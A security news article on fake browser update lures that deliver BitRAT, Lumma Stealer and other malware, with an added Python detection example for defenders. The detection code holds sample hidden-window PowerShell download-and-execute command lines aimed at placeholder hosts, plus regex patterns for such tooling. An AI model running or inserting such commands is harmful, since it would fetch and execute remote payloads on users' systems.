Fake browser updates are being used to distribute remote access trojans (RATs) and information-stealing malware like BitRAT and Lumma Stealer (also known as LummaC2).
According to a cybersecurity firm, these deceptive updates have been linked to several malware infections, including the notorious SocGholish malware.
The attack begins when a user visits a compromised website containing JavaScript code that redirects them to a fake browser update page (“chatgpt-app[.]cloud”). This page prompts the user to download a ZIP archive file (“Update.zip”) hosted on Discord, which is automatically downloaded to their device.
Cybercriminals often use Discord to disseminate malware, phishing campaigns, and spam. More than 50,000 malicious links were observed on Discord in the past six months.
The ZIP file contains another JavaScript file (“Update.js”) that executes PowerShell scripts, which then download additional payloads from a remote server, including BitRAT and Lumma Stealer disguised as PNG image files.
The PowerShell scripts also establish persistence on the infected device and use a .NET-based loader to launch the final-stage malware. This loader is marketed as a “malware delivery service” since it deploys both BitRAT and Lumma Stealer.
BitRAT is a versatile RAT that allows attackers to steal data, mine cryptocurrency, download more malware, and control infected hosts remotely. Lumma Stealer, a commodity malware available for $250 to $1,000 per month since August 2022, can capture information from web browsers, crypto wallets, and other sensitive sources.
Fake browser update lures are a common tactic for cyber attackers to gain access to devices or networks. These attacks often use drive-by downloads and malvertising techniques. However, a new variant of the ClearFake campaign discovered by ReliaQuest tricks users into manually executing malicious PowerShell code under the guise of a browser update.
The malicious site displays an error message and instructs users to install a root certificate by copying and running obfuscated PowerShell code. This code clears the DNS cache, displays a message box, downloads more PowerShell code, and installs LummaC2 malware.
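The two chains described above (Update.js launching PowerShell to fetch image-disguised payloads, and the ClearFake paste-and-run lure that flushes DNS and downloads a second stage) leave a recognisable trace in process-creation telemetry. The following is an added detection example, not code from the original report or any named vendor; the events, hostnames and command lines are constructed to mirror the article's description.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry). Event 1
# mirrors Update.js launching PowerShell to fetch a payload disguised as a PNG;
# event 2 mirrors the ClearFake "install a root certificate" lure pasted into a
# Run prompt; event 3 is a benign admin script for contrast.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://payload.invalid/update.png')\""},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"Clear-DnsClientCache; "
                "IEX (iwr http://lure.invalid/stage2)\""},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\nightly-backup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
IMAGE_URL_RE = re.compile(r"https?://\S+\.(?:png|jpe?g|gif)\b", re.I)
DNS_FLUSH_RE = re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I)


def flags_for(event):
    """Return the detection reasons that fire for one process-creation event."""
    parent = PureWindowsPath(event["parent"]).name.lower()
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["cmdline"]
    reasons = []
    if image != "powershell.exe":
        return reasons
    if parent in SCRIPT_HOSTS:
        reasons.append("script-host parent")        # Update.js -> wscript -> powershell
    if DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("download-and-execute")
    if IMAGE_URL_RE.search(cmd):
        reasons.append("payload-with-image-extension")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden-window")
    if DNS_FLUSH_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        reasons.append("dns-flush-then-download")   # ClearFake paste-and-run pattern
    return reasons


def triage(events):
    """Map event id -> reasons, keeping only events that fired at least one rule."""
    return {e["id"]: r for e in events if (r := flags_for(e))}
```

A real deployment would feed Sysmon Event ID 1 or EDR process events into `flags_for` and alert on any event with two or more reasons; the benign backup script in the sample fires none.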
Lumma Stealer has become one of the most prevalent information stealers, alongside RedLine and Raccoon. In Q4 2023, the number of logs from LummaC2 increased by 110%, indicating its high success rate in infiltrating systems and exfiltrating data undetected.
Meanwhile, researchers reported a new campaign using webhards (web hard drives) to distribute malicious installers for adult games and pirated software, leading to the deployment of various malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving pirated software websites have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are offered as pay-per-install (PPI) services for other cybercriminals.
Additionally, researchers reported that CryptoChameleon uses DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, part of the Chinese company Tencent, is known for providing services to malicious operators. CryptoChameleon uses fast flux evasion techniques, allowing it to cycle through numerous IP addresses linked to a single domain name, evading traditional countermeasures and reducing the effectiveness of legacy indicators of compromise (IOCs).
To prevent falling victim to fake browser update attacks, always ensure your software is updated directly from the official website or through the software’s built-in update mechanism. Avoid clicking on update prompts from unfamiliar websites. Implement strong security measures such as firewalls, anti-virus programs, and intrusion detection systems.